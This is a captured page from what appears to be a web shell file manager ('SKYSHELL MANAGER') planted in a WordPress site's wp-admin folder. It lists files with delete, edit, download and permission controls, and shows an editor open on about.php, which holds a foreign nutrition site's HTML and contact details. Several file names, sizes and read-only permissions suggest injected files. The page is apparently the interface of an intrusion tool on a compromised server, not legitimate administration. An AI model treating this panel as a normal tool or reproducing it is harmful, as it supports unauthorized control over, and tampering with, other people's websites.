📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: about.php
<!DOCTYPE html> <html lang="en"> <head> <title>Dietnutris</title> <link rel="icon" type="image/x-icon" href="images/fav.ico"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content="Tooplate"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/animate.css"> <link rel="stylesheet" href="css/owl.carousel.css"> <link rel="stylesheet" href="css/owl.theme.default.min.css"> <!-- MAIN CSS --> <link rel="stylesheet" href="css/tooplate-style.css"> <style> .dropdown { position: relative; display: inline-block; padding-top: 14px; } .dropdown-content { display: none; position: absolute; background-color: #f1f1f1; min-width: 260px; box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2); z-index: 1; } .dropdown-content a { color: black; padding: 12px 16px; text-decoration: none; display: block; } .dropdown-content a:hover {background-color: #ddd;} .dropdown:hover .dropdown-content {display: block;} </style> </head> <body id="top" data-spy="scroll" data-target=".navbar-collapse" data-offset="50"> <!-- HEADER --> <!-- MENU --> <section class="navbar navbar-default navbar-static-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="icon icon-bar"></span> <span class="icon icon-bar"></span> <span class="icon icon-bar"></span> </button> <!-- lOGO TEXT HERE --> <a href="index.php" class="navbar-brand"><img src="images/logo1.jpg" class="img-responsive"></a> </div> <!-- MENU LINKS --> <div class="collapse navbar-collapse"> <ul class="nav navbar-nav navbar-right"> <li><a href="index.php" class="smoothScroll">Home</a></li> <li><a href="about.php" class="smoothScroll">About Us</a></li> <li> <div class="dropdown"> <a class="smoothScroll">Work With Us</a> <div class="dropdown-content"> <a href="page1.php">Nutrition Counseling</a> <a href="page2.php">Nutrition Talks</a> <a href="page3.php">Health Professionals Mentoring</a> </div> </div> </li> <li><a href="page4.php" class="smoothScroll">Yoga & Meditation</a></li> <li><a href="contact.php" class="smoothScroll">Contact</a></li> <li class="appointment-btn"><a href="subscribe.php">Our Health Updates</a></li> </ul> </div> </div> </section> <!-- NEWS DETAIL --> <section id="news-detail" data-stellar-background-ratio="0.5"> <div class="container"> <div class="row"> <div class="col-md-6 col-sm-7"> <h2>About Us</h2> <p>Our dedication to scientific research and innovation inspires our team of experts every day to develop nutrition products to help build and maintain health from infancy onward.</p> <p>As a leader in nutrition science, research, and development, our goal is to deliver nutrition products and education that meet the changing needs of people around the world.</p> </div> <div class="col-md-6 col-sm-5"> <img src="images/abt.jpg" class="img-responsive" alt="" style="padding-bottom:30px;"> </div> </div> </div> </section> <!-- FOOTER --> <footer data-stellar-background-ratio="5"> <div class="container"> <div class="row"> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">What We Do</h4> <p>Our dedication to scientific research and innovation inspires our team of experts every day to develop nutrition products to help build and maintain health from infancy onward.</p> </div> </div> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">Navigation Links</h4> <p><a href="subscribe.php">Our Newsletter</a></p> <p><a href="page1.php">Nutrition Counseling</a></p> <p><a href="page2.php">Nutrition Talks</a></p> <p><a href="page3.php">Health Professionals Mentoring</a></p> <p><a href="page4.php" class="smoothScroll">Yoga & Meditation</a></p> </div> </div> <div class="col-md-4 col-sm-4"> <div class="footer-thumb"> <h4 class="wow fadeInUp" data-wow-delay="0.4s">Contact Info</h4> <div class="contact-info"> <p><i class="fa fa-phone"></i> (+91) 95975 46987</p> <p><i class="fa fa-envelope-o"></i> <a href="mailto:anthonychavez@dietnutris.com">anthonychavez@dietnutris.com</a></p> <p style="display: flex;"><i class="fa fa-map-marker"></i>No 12 Vinayagapuram,<br> Kalangarkarunanithi street,<br> Oorakadam, Aambathur,<br> Chennai, Tamilnadu, IN - 600053.</p> </div> </div> </div> <div class="col-md-12 col-sm-12 border-top"> <div class="col-md-4 col-sm-6"> <div class="copyright-text"> <p>Copyright © 2024 Dietnutris</p> </div> </div> <div class="col-md-6 col-sm-6"> <div class="footer-link"> <a href="privacy.php">Privacy Policy</a> <a href="terms.php">Terms & Conditions</a> </div> </div> <div class="col-md-2 col-sm-2 text-align-center"> <div class="angle-up-btn"> <a href="#top" class="smoothScroll wow fadeInUp" data-wow-delay="1.2s"><i class="fa fa-angle-up"></i></a> </div> </div> </div> </div> </div> </footer> <!-- SCRIPTS --> <script src="js/jquery.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.sticky.js"></script> <script src="js/jquery.stellar.min.js"></script> <script src="js/jquery.magnific-popup.min.js"></script> <script src="js/magnific-popup-options.js"></script> <script src="js/wow.min.js"></script> <script src="js/smoothscroll.js"></script> <script src="js/owl.carousel.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save